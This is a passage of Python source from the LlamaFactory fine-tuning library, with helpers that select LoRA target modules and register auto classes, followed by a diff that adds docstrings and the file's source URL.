    r"""Find the modules in the expanded blocks to apply LoRA.

    Picks every ``stride``-th layer (counting from the end of each stride window)
    and keeps only target modules living inside those layers.
    Raises ValueError if the layer count is missing or not divisible.
    """
    num_layers = getattr(model.config, "num_hidden_layers", None)
    if not num_layers:
        raise ValueError("Model was not supported.")

    if num_layers % num_layer_trainable != 0:
        raise ValueError(
            f"`num_layers` {num_layers} should be divisible by `num_layer_trainable` {num_layer_trainable}."
        )

    stride = num_layers // num_layer_trainable
    trainable_layer_ids = range(stride - 1, num_layers + stride - 1, stride)
    # layer indices appear as ".<idx>." inside dotted module names
    trainable_layers = [f".{idx:d}." for idx in trainable_layer_ids]
    module_names = [
        name
        for name, _ in model.named_modules()
        if any(target in name for target in target_modules)
        and any(layer_tag in name for layer_tag in trainable_layers)
    ]
    logger.info_rank0("Apply lora to layers: {}.".format(",".join(map(str, trainable_layer_ids))))
    return module_names
def register_autoclass(config: "PretrainedConfig", model: "PreTrainedModel", tokenizer: "PreTrainedTokenizer"):
    r"""Register remote-code classes with their auto classes when an ``auto_map`` is declared.

    Only classes whose config/tokenizer advertises the matching auto-class entry
    are registered; everything else is left untouched.
    """
    if "AutoConfig" in getattr(config, "auto_map", {}):
        config.__class__.register_for_auto_class()
    if "AutoModelForCausalLM" in getattr(config, "auto_map", {}):
        model.__class__.register_for_auto_class()
    # tokenizers keep their auto_map inside init_kwargs rather than as an attribute
    if "AutoTokenizer" in tokenizer.init_kwargs.get("auto_map", {}):
tokenizer.__class__.register_for_auto_class() | --- +++ @@ -26,6 +26,7 @@
def find_all_linear_modules(model: "PreTrainedModel", freeze_vision_tower: bool) -> list[str]:
+ r"""Find all available modules to apply LoRA, GaLore or APOLLO."""
model_type = getattr(model.config, "model_type", None)
forbidden_modules = {"lm_head"}
if model_type == "chatglm":
@@ -52,6 +53,7 @@
def find_expanded_modules(model: "PreTrainedModel", target_modules: list[str], num_layer_trainable: int) -> list[str]:
+ r"""Find the modules in the expanded blocks to apply lora."""
num_layers = getattr(model.config, "num_hidden_layers", None)
if not num_layers:
raise ValueError("Model was not supported.")
@@ -81,4 +83,4 @@ if "AutoModelForCausalLM" in getattr(config, "auto_map", {}):
model.__class__.register_for_auto_class()
if "AutoTokenizer" in tokenizer.init_kwargs.get("auto_map", {}):
- tokenizer.__class__.register_for_auto_class()+ tokenizer.__class__.register_for_auto_class()
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/model/model_utils/misc.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.